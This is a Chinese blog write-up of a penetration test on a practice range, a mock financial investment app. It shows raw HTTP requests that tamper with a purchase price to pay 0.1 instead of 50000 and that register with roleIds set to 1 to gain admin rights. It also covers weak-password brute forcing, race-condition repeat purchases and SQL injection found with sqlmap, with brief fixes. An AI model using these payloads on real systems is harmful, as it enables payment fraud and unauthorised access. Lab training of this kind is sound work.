某金融程序靶场测试的项目

声名:本靶场来自州弟学安全

1
2
3
4
5
6
7
8
9
10
11
12
渗透场景靶场:某小型金融程序  
地址:http://111.119.241.115:18899/
开发背景:后端基于springboot开发,前端基于SPA架构开发
项目背景:你是一名安全服务工程师,这个"资金云控系统"是甲方即将上线的部分功能,功能点不多,需要你作为渗透测试工程师进行漏洞挖掘以及风险排查(记住不是SRC仿真,是上线前的渗透测试),挖掘到漏洞和风险后,你需要进行总结和整理修复建议
步骤建议:
1. 访问登录页面后先获取渗透测试授权书(仿真步骤)
2. 下载渗透测试报告模板以便于后续使用
3. 开始渗透测试漏洞挖掘以及风险排查
4. 总结漏洞和修复建议,明确漏洞点导致的情况,进行总结报告
说明:本站点仅供学习参考,真实渗透请遵循网络安全法,请勿使用公司或者客户现场网络进行扫描攻击,以免导致被标记
注意:环境每60分钟重置一次,防止内存和数据库爆满
可以互相转发,共同进行漏洞挖掘,漏洞均为当下src和现实场景下经验复现,并非古老类型漏洞

一. 弱口令漏洞(高危)

打开网址就是个登录页面,使用抓包工具对其进行弱口令的爆破,注意原始数据需要删除。

找到了正确的密码:

二. 理财产品支付漏洞(高危)

随机尝试购买一个理财产品,并进行抓包分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /api/investment/purchase HTTP/1.1
Host: 111.119.241.115:18899
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJ1c2VySWQiOjEsImVtYWlsIjoiYWRtaW5AZnVuZGNsb3VkLmNvbWNjIiwic3ViIjoiYWRtaW4iLCJpYXQiOjE3NTAyMjg3NDgsImV4cCI6MTc1MDMxNTE0OH0.CB_Wg05uVMjk_PfCyKuKk7AxYagEVw3hh4481Tjipd0C-AMhDgj9cQk1B60n6mhqfRbSXDt8rBYwt0aJklQdIA
Content-Type: application/json
Origin: http://111.119.241.115:18899
Referer: http://111.119.241.115:18899/index.html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Content-Length: 69

{"productId":4,"accountId":"5","shares":1,"paymentAmount":"50000.00"}

发现paymentAmount是产品的价格,更改一下请求包进行尝试。

1
{"productId":4,"accountId":"5","shares":1,"paymentAmount":"0.1"}

购买成功了,证明具有支付漏洞

三. 并发造成的多次购买产品(高危)

注册一个用户,初始资产是1000,使用bp抓包,使用并发进行测试

发现了1000元买了多个超出价钱范围的商品,漏洞存在

四. 管理员功能存在SQL注入(高危)

在用户管理页面发现了搜索功能,搜索功能一般是与数据库直接进行交互的,可以抓包,使用sqlmap进行测试

测试出了时间盲注

1
2
3
漏洞成因:用户管理搜索位置存在SQL注入,过滤不严格或未进行预编译
修复方案:对SQL语句进行预编译操作
值得注意的是,在Java中的使用mybatis框架默认对SQL语句预编译的,是不存在SQL注入的,这里为了复现注入漏洞,把搜索用户单独划分了

五. 用户注册权限控制导致越权(高危)

在注册的时候修改参数roleids:因为roleids默认注册为2,但是我们修改为1的话,就是管理员权限了

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /auth/register HTTP/1.1
Host: 111.119.241.115:18899
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Origin: http://111.119.241.115:18899
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Accept: */*
Referer: http://111.119.241.115:18899/login.html?username=demo
Content-Length: 197

{"username":"demo11","password":"96e79218965eb72c92a549dd5a330112","confirmPassword":"96e79218965eb72c92a549dd5a330112","email":"dem1o1@qq.com","mobile":"19999999999","realName":"demo11","roleIds":[1]}


某金融程序靶场测试的项目
http://example.com/2025/06/18/某金融程序靶场测试的项目/
作者
XCDH
发布于
2025年6月18日
许可协议